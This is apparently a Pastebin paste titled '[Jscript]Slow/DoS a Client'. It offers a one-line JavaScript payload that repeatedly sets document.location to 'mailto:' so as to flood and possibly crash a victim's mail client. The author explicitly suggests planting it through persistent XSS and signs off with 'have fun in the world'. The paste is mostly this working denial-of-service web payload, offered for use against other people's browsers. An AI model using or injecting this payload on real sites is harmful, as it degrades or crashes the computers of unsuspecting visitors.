Advertisement
The_KGB

[Jscript]Slow/DoS a Client

Mar 18th, 2012
146
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. This script can cause a client DoS or even crash their computer.
  2. Can be used in persistent XSS -- Please be careful and don't run on yourself...Unless you really want to.
  3.  
  4. As Always, have fun in the world.
  5.  
  6. Script:
  7. <script>var x=150;while(x>0){document.location="mailto:";x--;}</script>
  8. *Obviously, X = How many times to open. :D
  9. -Your Friend
  10. ___ __ _
  11. | |_ _ |/ /__|_)
  12. | | |(/____|\ \_||_)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement